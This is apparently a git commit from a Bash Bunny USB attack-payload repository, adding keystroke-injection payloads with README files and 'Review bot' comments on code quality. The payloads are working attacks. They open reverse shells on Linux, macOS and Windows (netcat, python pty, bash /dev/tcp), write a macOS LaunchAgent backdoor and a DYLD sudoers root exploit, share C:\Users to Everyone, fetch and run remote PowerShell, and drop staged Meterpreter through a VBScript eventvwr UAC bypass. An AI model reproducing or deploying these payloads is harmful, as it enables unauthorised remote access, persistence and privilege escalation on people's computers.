Cleanup: Sort payloads by category

Sebastian Kinne
2017-04-10 13:29:17 +10:00
parent 288d90c60e
commit 85b1bc7aca
513 changed files with 2 additions and 361 deletions


@@ -0,0 +1,31 @@
# Linux Reverse Shell for Bash Bunny
Author: tuzzmaniandevil
Version: Version 1.0
## Description
With the help of ducky script, it opens a terminal window using `CTRL ALT T`. Once the window is open it will copy the script to a hidden directory in the home directory.
The script will then be executed which starts a background reverse shell, delete itself and closes the terminal window.
Great when combined with the LAN Turtle :-)
Example listening for the connection on linux:
`nc -nlvp 4444`
## Configuration
- **RHOST** The host computer to connect to
- **RPORT** The post to use for the connection
## Requirements
The RHOST pc must be accessible from the target machine
## STATUS
| LED | Status |
| ---------------- | ------------------------------------- |
| Red | Setup |
| Blue (blinking) | Executing Ducky and starting script |
| Green | Finished |
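Review bot: the Description sentence "it will copy the script to a hidden directory in the home directory" does not match the payload, which copies to `~/a.sh` in the home directory itself (only the named pipe under `~/.a/` is hidden); the README should also list the target-side dependency on `nc` that `a.sh` relies on. Minor: "The post to use for the connection" should read "The port to use", and "Version: Version 1.0" repeats the word.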


@@ -0,0 +1,10 @@
#!/bin/bash
A="$0"
H=$1
P=$2
rm -rf ~/.a/
mkdir -p ~/.a/
mknod ~/.a/p p
/bin/sh -c /bin/sh 0<~/.a/p | nc $H $P 1>~/.a/p &
disown $!
rm -f "$A"
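Review bot: `H=$1` and `P=$2` are never validated, so running the script without both arguments still reaches `nc $H $P` with empty values and leaves the background `/bin/sh` blocked on the pipe; check `[ $# -eq 2 ]` first and quote the expansions (`"$H" "$P"`). The README's "delete itself" claim is also only partly true here: `rm -f "$A"` removes the script file, but `~/.a/` and the named pipe `~/.a/p` stay on disk for the life of the connection and after it ends, which the README should state.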


@@ -0,0 +1,49 @@
#!/bin/bash
#
# Title: Linux Reverse Shell
# Author: tuzzmaniandevil
# Version: 1.0
#
# Runs a script in the background that creates a reverse shell connection to the configured address and then removes itself.
#
# Red ...............Setup
# Blue Blinking......Executing
# Green..............Finished
# Config options
RHOST=127.0.0.1
RPORT=4444
# Start Setup
LED R
# Set Attack Mode
ATTACKMODE HID STORAGE
LANGUAGE='us'
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
# Wait for Storage to mount
sleep 5
# Open a terminal
Q CTRL-ALT t
# Wait for terminal to open
sleep 1
LED B 250
# Copy bash script
Q STRING "cp \$(readlink -f /dev/disk/by-label/BashBunny | while read dev;do mount | grep \"\$dev\b\" | awk '{print \$3}';done)/payloads/"
Q STRING $SWITCH_POSITION
Q STRING "/a.sh ~/a.sh && chmod +x ~/a.sh && ~/a.sh $RHOST $RPORT"
Q ENTER
# Quit the terminal
LED R G 250
Q STRING exit
Q ENTER
LED G
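Review bot: the color legend in the header (`# Red ...............Setup`, `# Blue Blinking......Executing`, `# Green..............Finished`) omits the amber-blinking state set by `LED R G 250` before the terminal is closed; add it to the legend and to the README table. The default `RHOST=127.0.0.1` also means an unedited payload makes the target connect back to itself, so the `# Config options` comment should say both values have to be changed before use.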


@@ -0,0 +1,49 @@
LED B
#Set your Variables, bro
DYLD_ROOT=true
LHOST=192.168.17.12
LPORT=4444
LANGUAGE='us'
# Gimme a Keyboard please. Thanks.
ATTACKMODE HID VID_0X05AC PID_0X021E
LED R G B
# Get a terminal
QUACK DELAY 400
QUACK GUI SPACE
QUACK DELAY 300
QUACK STRING terminal
QUACK DELAY 200
QUACK ENTER
QUACK DELAY 400
# optional DYLD exploit script
if $DYLD_ROOT; then
LED R
QUACK SPACE
QUACK STRING echo \'echo \"\$\(whoami\) ALL=\(ALL\) NOPASSWD\:ALL\" \>\&3\' \| DYLD_PRINT_TO_FILE=\/etc\/sudoers newgrp\; sudo -s
QUACK ENTER
QUACK DELAY 200
QUACK ENTER
QUACK ENTER
QUACK ENTER
QUACK ENTER
QUACK DELAY 200
fi
# python reverse shell
QUACK SPACE
QUACK STRING \(python -c \'import sys,socket,os,pty\; \_,ip,port=sys.argv\; s=socket.socket\(\)\; s.connect\(\(ip,int\(port\)\)\)\; [os.dup2\(s.fileno\(\),fd\) for fd in \(0,1,2\)]\; pty.spawn\(\"\/bin\/bash\"\)\' $LHOST $LPORT \&\)
QUACK ENTER
QUACK DELAY 200
QUACK SPACE
QUACK STRING clear
QUACK ENTER
QUACK GUI q
QUACK DELAY 100
QUACK ENTER
# Green is the official Light of "finished"
LED G
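Review bot: `if $DYLD_ROOT; then` executes the variable's contents as a command (it only works because `true` and `false` are commands), so a typo in the value either runs something else or fails silently; test it as a string, e.g. `if [ "$DYLD_ROOT" = true ]; then`, the way RAZ_ReverseShell handles `auto_increment`. This file also lacks the `# Title` / `# Author` / `# Version` / `# Target` header the other payloads carry, and the README's caveat that the DYLD trick does not work on updated macs belongs in the file next to `DYLD_ROOT=true`.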


@@ -0,0 +1,21 @@
# Mac Reverse Shell
Author: mrt0mat0
Version: Version 1.0
## Description
Using ducky script, it opens a python reverse shell to the IP and PORT of your choosing. Also, as a nice little bonus, it runs the DYLD exploit that, if vulnerable will give you a root shell.
## Configuration
This is configured for Macbooks as a keyboard. I am not 100% about how the VID and PID variables work, so that may just be BS at the top :) - That's what github is for. Exploit does not work on updated macs
## STATUS
| LED | Status |
| ---------------- | ------------------------------------- |
| Blue | Setup |
| White | Running the scripts |
| Red | r00t exploit is running (optional |
| Green | Finished |
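Review bot: the Configuration section never says where the listener address is set; `LHOST` and `LPORT` live at the top of payload.txt, and the README should say so instead of only discussing the VID/PID guess. In the table, `| Red | r00t exploit is running (optional |` is missing its closing parenthesis, and "Version: Version 1.0" repeats the word.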


@@ -0,0 +1,9 @@
ECHO off
REM gather the system file structure
mkdir c:\Users\tempa
tree /a /f > c:\Users\tempa\tree.txt
REM creates a hidden share syntax(net share <sharename>=<sharelocation> /grant:<user>,<permission>)
net share nless$=C:\Users /grant:Everyone,full
REM creates security permissions for the shared folder syntax(icacls <sharedlocation> /grant <user>:<permissoons> /T
icacls "C:\Users" /grant Everyone:(OI)(CI)F /T
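Review bot: `ECHO off` without the leading `@` still echoes that line itself; use `@echo off`. The comment on the icacls line is missing its closing parenthesis and misspells "permissions" as "permissoons". The README's cleanup hint (`icacls "c:\Users" /remove:g Everyone /T`) only reverts the ACL change; the `net share nless$` share and the `c:\Users\tempa` directory created here are not undone by it, so the test-cleanup instructions should also cover `net share nless$ /delete` and removing `tempa`.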


@@ -0,0 +1,48 @@
#!/bin/bash
#
# Title: Nothing Less
# Author: StinkyBliss
# Version: 1.0
# Target: Windows
#
#
# Maps the file system and stores it in c:\users\tempa
# Shares a location to everyone and grants full security permissions to everyone
#
# For testing use: 'icacls "c:\Users" /remove:g Everyone /T' to remove the created security permissions
# To share a drive change the path in nl.cmd to c: remove the quotes
LED R 200
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
ATTACKMODE HID
Q GUI r
Q DELAY 100
Q STRING powershell Start-Process powershell -Verb runAs
#Q STRING powershell
Q ENTER
# Bypass UAC
Q DELAY 1000
Q LEFT
Q ENTER
LED R G 200
ATTACKMODE HID STORAGE
# Start nl.cmd
Q STRING ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\nl.cmd')"
Q ENTER
# Wait for nl.cmd and exit
Q DELAY 1000
Q STRING exit
Q ENTER
sync
LED G
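Review bot: the `# Bypass UAC` comment above `Q LEFT` / `Q ENTER` is misleading: those keystrokes answer the UAC consent prompt raised by `Start-Process powershell -Verb runAs`, which only succeeds when the logged-on user is already a local administrator and the prompt is shown on screen; rename the comment and state the administrator requirement in the header and README. Separately, `source bunny_helpers.sh` is loaded to obtain `SWITCH_POSITION`, yet the path on the `Q STRING ".((gwmi win32_volume ...` line hard-codes `payloads\switch1\nl.cmd`, so the payload only works from switch 1.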


@@ -0,0 +1,23 @@
# NothingLess for Bash Bunnys
* Author: StinkyBliss
* Version: Version 1.0
* Target: Windows
## Description
For testing use: 'icacls "c:\Users" /remove:g Everyone /T' to remove the created security permissions
To share a drive change the path in nl.cmd to c: remove the quotes
## Configuration
None, only optionl changes
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Red (blinking) | Setting up |
| yellow (blinking) | Attack running |
| Green | Attack Complete |
| ------------------ | -------------------------------------------- |
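Review bot: the Description section contains only the testing/cleanup notes and never says what the payload does; the two sentences from the payload header (maps the file system into `c:\users\tempa`, shares `C:\Users` to Everyone with full permissions) belong here so a reader knows the impact before running it. Minor: "optionl" should read "optional", and the trailing `| ------------------ | ... |` line after the Green row renders as an extra table row in Markdown.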


@@ -0,0 +1,68 @@
#!/bin/bash
#
# Title: RAZ_MacReverseShell
# Author: RalphyZ
# Version: 1.1
# Target: Mac OSX
# Dependencies: None
#
# Description: Starts a terminal window on a Mac,then creates a bash reverse
# shell inside a script, /tmp/s.sh. It then adds the script to the
# Launch Agent - establishing persistence - running at a
# user-defined interval
#
# Colors:
# Green (blinking)..........Working
# White.....................Completed without error
# Edit this to point to the NetCat Listener
LISTENER_IP="192.168.1.100"
LISTENER_PORT="4444"
# How often (in minutes) should this run from the Launch Agent
FREQUENCY="60"
#----Proceed with Caution------------------------------------------------------
# Green blinking LED
LED G 100
# Human Interface Device
ATTACKMODE HID
# Emulate the Ducky - QUACK!
QUACK DEFAULT_DELAY 300
# Start the Mac Terminal
QUACK COMMAND SPACE
QUACK STRING terminal
QUACK DELAY 500
QUACK ENTER
# Give the terminal window a second to pop up
QUACK DELAY 1000
# Bash Reverse Shell into a script 's.sh'
QUACK STRING echo \"bash -i \>\& /dev/tcp/${LISTENER_IP}/${LISTENER_PORT} 0\>\&1\" \> /tmp/s.sh
QUACK ENTER
QUACK DELAY 500
# Change file permissions to allow execution
QUACK STRING chmod +x /tmp/s.sh
QUACK ENTER
QUACK DELAY 500
# Add to the Launch Agents
QUACK STRING printf \"\<plist version=\\\"1.0\\\"\>\\n \<dict\>\\n \<key\>Label\</key\>\\n \<string\>com.ralphyz.backdoor\</string\>\\n \<key\>ProgramArguments\</key\>\\n \<array\>\\n \<string\>/bin/sh\</string\>\\n \<string\>/tmp/s.sh\</string\>\\n \</array\>\\n \<key\>RunAtLoad\</key\>\\n \<true/\>\\n \<key\>StartInterval\</key\>\\n \<integer\>${FREQUENCY}\</integer\>\\n \<key\>AbandonProcessGroup\</key\>\\n \<true/\>\\n \</dict\>\\n\</plist\>\" \> \~/Library/LaunchAgents/com.ralphyz.backdoor.plist
QUACK ENTER
QUACK DELAY 500
# Load the new Launch Agent - establishing persistence - and clear the terminal
QUACK STRING launchctl load com.ralphyz.backdoor.plist \&\& clear
QUACK ENTER
# Close the Terminal Window
QUACK COMMAND q
# White LED for finished
LED R G B
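Review bot: the plist is written to `~/Library/LaunchAgents/com.ralphyz.backdoor.plist` on the printf line, but the following `launchctl load com.ralphyz.backdoor.plist` passes a bare file name relative to the terminal's working directory, so the two paths disagree. The header's `# Dependencies: None` is also inaccurate, since the typed `bash -i >& /dev/tcp/...` line needs a bash with `/dev/tcp` support on the target, and the Colors legend has no failure state because nothing in the keystroke sequence is checked.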


@@ -0,0 +1 @@
192.168.1.100


@@ -0,0 +1 @@
4444


@@ -0,0 +1,75 @@
#!/bin/bash
#
# Title: RAZ_ReverseShell
# Author: RalphyZ
# Version: 1.0
# Target: Windows 7+
# Dependencies: The following files must exist in the switch folder:
# nc.exe - Windows binary for netcat with the -e flag
# listener_port.txt - The Port number for the netcat listener
# listener_ip.txt - The IP Address for the netcat listener
#
# Description: Executes a netcat reverse cmd shell at a given IP and Port
# Intentionally, this script leaves a trace in the Run Box
#
# Colors:
# Green.....................Working
# White.....................Completed without error
# White (blinking)..........Incrementing the port in listener_port.txt
# Blue (blinking)...........listener_port.txt was not found
# Light-Blue (blinking).....listener_ip.txt was not found
# Amber (blinking)..........nc.exe was not found
# Change this if you want to enable auto_increment of the netcat port
# If true, the port number is increased by 1 everytime the script runs
# This is good for Red Teams doing PenTesting on multiple computers
auto_increment=false
LED G
ATTACKMODE HID STORAGE
LANGUAGE='us'
# Get the switch position
source bunny_helpers.sh
# Check for all the files - error if not found. If found, put into variables
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then
LED B 100
exit 1
else
my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt`
fi
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then
LED B G 100
exit 1
else
my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt`
fi
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then
LED R G 100
exit 1
fi
# Execute the powershell command in the run box with the appropriate variables
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe"
QUACK ENTER
# If auto_increment, then update the listener_port file
if [ "$auto_increment" = true ] ; then
LED R G B 100
echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt
# Allow the write to sync to the USB
sleep 1
fi
# Signal everything went OK - white
LED R G B
exit 0
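Review bot: `my_port` is taken verbatim from listener_port.txt with backticks and never validated; if the file was saved with a trailing CRLF or contains anything but digits, `$((my_port + 1))` in the `auto_increment` branch aborts with an arithmetic error after the keystrokes have already been sent. Strip the value (e.g. `my_port=$(tr -dc '0-9' < "$file")`), check it is numeric before use, and prefer `$( )` over backticks. The write-back also relies on `sleep 1` to flush to the USB disk while the host has it mounted; the NothingLess payload calls `sync` explicitly, which is the more reliable choice.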


@@ -0,0 +1,6 @@
DELAY 2000
GUI r
DELAY 200
STRING powershell -windowstyle hidden $u='YOUR_LINK';$r=Invoke-WebRequest -Uri $u;powershell -nop -e $r.content
DELAY 100
ENTER
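Review bot: the placeholder `$u='YOUR_LINK'` on the STRING line must be edited before the payload can run, but nothing in this file says so; add a `REM` comment like the one at the top of the meterpreter ducky script in this commit. The same line fetches and executes remote content over plain HTTP through a URL shortener, so the README should state that the target runs whatever the shortened link currently resolves to.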


@@ -0,0 +1,18 @@
LED G
ATTACKMODE HID STORAGE
# Set your language here
LANGUAGE='us'
LED R G
# Check for switch position to make it easier for us.
source bunny_helpers.sh
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
QUACK ${SWITCH_POSITION}/ducky_script.txt
LED G
else
LED R
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
exit 1
fi
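Review bot: `LED G` is set both at the top of the file and on success inside the `if`, so green means "setting up" and "finished" at the same time, while the README table for this payload lists Red/Amber/Green with no setup color; use a distinct color for the initial state or drop the first `LED G`. The error branch writes to `/root/debuglog.txt`, and the README should mention that log location for troubleshooting.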


@@ -0,0 +1,39 @@
# SingleSecondShell
Author: [@0xCoto](https://github.com/0xCoto)
Version: Version 1.0
## Description
Plug in the bash bunny, get a shell. Instantly.
The <1 Second ReverseShell Payload is going to run blazing fast on the Bash Bunny, and cannot work on any other BadUSB devices, such as the USB Rubber Ducky that quick. That is obviously the reason this Payload is dedicated and specifically developed for the Bash Bunny. Plug in, and before you know it, you've got a shell. How awesome is that?
## Configuration
#### Generating Payload
In order to generate your reverse_tcp Payload, you need to run the following command on your Kali machine (unless you have msfvenom installed on another OS): ```msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f psh-cmd smallest```
Make sure to replace `YOUR_IP` with your local/public IP Address (depending on the type of attack you are looking to perform) and `YOUR_PORT` with the port that you've forwarded (if you are performing a public attack, outside your network).
When the payload is generated, remove everything up to `powershell.exe` and upload it to pastebin. Here's my example: http://pastebin.com/raw/DJbS5mTj
#### Shortening the URL
As you can see, we have a pretty long URL. So, in order to shorten the URL and reduce the amount of keystrokes, therefore attacking time, we are going to be using a URL shortening service, such as https://goo.gl/.
#### Completeing the script
That's it. Now just replace the `$u='YOUR_LINK'` with your new URL. For example: `$u='goo.gl/8ggZD1'`
Note: You do not need to include `http(s)://` in your URL, so you can go ahead and get rid of that too to reduce keystrokes and speedup the keystroke injection.
## Listening to Connections
Listening to connections is pretty straightforward, but I'm not going to cover it in detail in this tutorial. All you need to do is use a listener software, CLI or GUI, such as `msfconsole` or `Armitage`, both of which can be setup to work with each other very easily.
## Bash Bunny Status
| LED | Status |
| ---------------- | ------------------------------------- |
| Red | Failed to open script file |
| Amber | Script Running |
| Green | Finished |
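Review bot: "Completeing the script" should read "Completing the script", and "Version: Version 1.0" repeats the word. The Description's claim that the payload "cannot work on any other BadUSB devices ... that quick" is unsupported; the file is a six-line Ducky script and the speed comes from the Bash Bunny's typing rate, so say that plainly. The Status table should also reflect that payload.txt shows green at the start as well as at the finish.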


@@ -0,0 +1,48 @@
#!/bin/bash
#
# @title: Bash bunny Windows staged meterpreter payload
# @author: Silvian Dragan
# @props: Darren Kitchen, Mubix
# @version: 1.0
# @target: Windows 7 8, 8.1 and 10.
#
#
# @details: This is an a advanced meterpreter staged payload injection using the
# rubber ducky capabilites of the bash bunny to call a powershell script referred
# to sc.txt which must be hosted on a remote server.
# This script then downloads the update.exe which is also hosted on
# a remote host, and then executes it on the target machine.
# note it will also attempt to clean up any registry footprint from the run command.
# Once the bash bunny is initialized the script should not take more than
# 2-3 sec to execute.
#
# @Dependencies: you must have sc.txt and update.exe hosted on a remote server.
# replace the 127.0.0.1 with your own host and also feel free to change the name
# of either sc.txt or update.exe to names of your choosing.
# You must also generate the appropariate update.exe payload using msfvenom for
# windows meterpreter reverse http/https/tcp etc. Please see Mubix's fantastic
# tutorials on metasploit minute/ meterpreter/ msfvenom for details. :)
#
# Colors:
# Amber: starts the attack payload
# Green: successful execution
# Red: failure to load dependency ducky script
#
ATTACKMODE HID
LED R G 200
LANGUAGE='us'
source bunny_helpers.sh
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky.txt" ]; then
QUACK ${SWITCH_POSITION}/windows-staged-meterpreter.txt
LED G
else
LED R
echo "Unable to load dwindows-staged-meterpreter.txt" >> /root/debuglog.txt
exit 1
fi
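Review bot: the existence check tests `/root/udisk/payloads/${SWITCH_POSITION}/ducky.txt` but the next line runs `QUACK ${SWITCH_POSITION}/windows-staged-meterpreter.txt`, so the guard does not cover the file actually used, and the error message misspells it as `dwindows-staged-meterpreter.txt`; make all three names agree. The `@details` text also claims the run "will also attempt to clean up any registry footprint from the run command", but nothing in this file or in sc.txt touches the Run-box history (sc.txt only deletes the `mscfile\shell\open\command` value it wrote), so the header and README should describe only what the code does.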


@@ -0,0 +1,32 @@
# Windows Meterpreter staged payload
* Author: Silvian
* Version: Version 1.0
* Target: Windows 7, 8, 8.1, 10
## Description
This is an a advanced meterpreter staged payload injection using the
rubber ducky capabilites of the bash bunny to call a powershell script referred
to sc.txt which must be hosted on a remote server.
This script then downloads the update.exe which is also hosted on
a remote host, and then executes it on the target machine.
Note it will also attempt to clean up any registry footprint from the run command.
Once the bash bunny is initialized the script should not take more than 2-3 sec to execute.
## Dependencies
you must have sc.txt and update.exe hosted on a remote server.
replace the 127.0.0.1 with your own host and also feel free to change the name
of either sc.txt or update.exe to names of your choosing.
You must also generate the appropariate update.exe payload using msfvenom for
windows meterpreter reverse http/https/tcp etc. Please see Mubix's fantastic
tutorials on metasploit minute/ meterpreter/ msfvenom for details. :)
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Amber | Executin Payload |
| Green | Attack Finished |
| Red | Failed to load dependencies |
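Review bot: "Executin Payload" should read "Executing Payload", "an a advanced" should read "an advanced", "capabilites" should read "capabilities", "appropariate" should read "appropriate", and "Version: Version 1.0" repeats the word. The Dependencies section says to "replace the 127.0.0.1" without saying where it appears: both the ducky script and the `bitsadmin` line in sc.txt hard-code it, and the ducky script's file name (`windows-staged-meterpreter.txt`) should be listed with the other required files.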


@@ -0,0 +1,30 @@
Sub Main()
'Download File
CreateObject("WScript.Shell").run("cmd /c bitsadmin /transfer SoftUpdate /download /priority FOREGROUND http://127.0.0.1/update.exe %temp%/update.exe"),0,true
'Set new zoneId
CreateObject("WScript.Shell").run("cmd.exe /C echo [zoneTransfer]ZoneID = 2 > " + CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) + "\update.exe:ZONE.identifier"),0,true
'Write UAC bypass regkey
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) +"\update.exe" ,"REG_SZ"
'Trigger UAC bypass
CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true
'Reset regkey
GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\",""
'Remove this script
CreateObject("WScript.Shell").Run "cmd /c del " + WScript.ScriptFullName, 0, False
End Sub
'Dont wanna display shit
On Error Resume Next
Main
If Err.Number Then
'on error cleanup and exit
CreateObject("WScript.Shell").Run "cmd /c del " + WScript.ScriptFullName, 0, False
WScript.Quit 4711
End If
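Review bot: string concatenation mixes `+` (`"cmd /c del " + WScript.ScriptFullName`) with `&` (`"winmgmts:..." & "." & "\root\default:StdRegProv"`); in VBScript `&` is the concatenation operator and `+` is overloaded with numeric addition, so use `&` throughout. `WScript.Quit 4711` is an undocumented exit code with no comment explaining it, and the `'Dont wanna display shit` comment should be replaced with a description of what the `On Error Resume Next` guard is for. The error branch also deletes the script but does not undo the `RegWrite`, so a failed run leaves the `HKCU\Software\Classes\mscfile\shell\open\command` value in place, which the header comment should disclose.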


@@ -0,0 +1,7 @@
REM change 127.0.0.1 to the IP address or host name of your own host service
DELAY 1000
GUI r
DELAY 100
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://127.0.0.1/sc.txt', '%temp%/update.vbs'); %temp%/update.vbs
ENTER
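Review bot: the `REM` comment says to change 127.0.0.1 here, but the same address is hard-coded again in sc.txt (`bitsadmin ... http://127.0.0.1/update.exe`), so the comment should say both files need editing. The target path `%temp%/update.vbs` uses a forward slash; `%temp%\update.vbs` is the conventional Windows form and matches how sc.txt itself builds its paths.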